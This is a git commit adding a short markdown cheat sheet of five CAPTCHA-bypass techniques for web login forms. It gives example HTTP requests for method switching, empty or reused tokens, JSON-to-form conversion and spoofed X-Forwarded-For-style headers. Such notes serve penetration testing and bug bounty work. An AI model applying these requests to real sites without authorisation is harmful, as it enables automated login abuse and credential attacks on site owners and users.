Bypass Captcha [1]

Create bypass captcha tips and add 5 tips
2024-12-18 18:36:12 +00:00 · 2020-09-16 10:00:24 +07:00 · 2020-09-16 10:00:24 +07:00 · c972fd33ce
commit c972fd33ce
parent 74b4c4b2eb
1 changed files with 59 additions and 0 deletions
--- a/BypassCaptcha.md
+++ b/BypassCaptcha.md
@ -0,0 +1,59 @@
+# Bypass Captcha
+1. Try changing the request method, for example POST to GET
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+Change the method to GET
+```
+GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
+Host: target.com
+[...]
+```
+
+2. Try remove the value of the captcha parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=&_Username=daffa&_Password=test123
+```
+
+3. Try reuse old captcha token
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
+```
+
+4. Convert JSON data to normal request parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
+```
+Convert to normal request
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+5. Try custom header to bypass captcha
+```
+X-Originating-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+```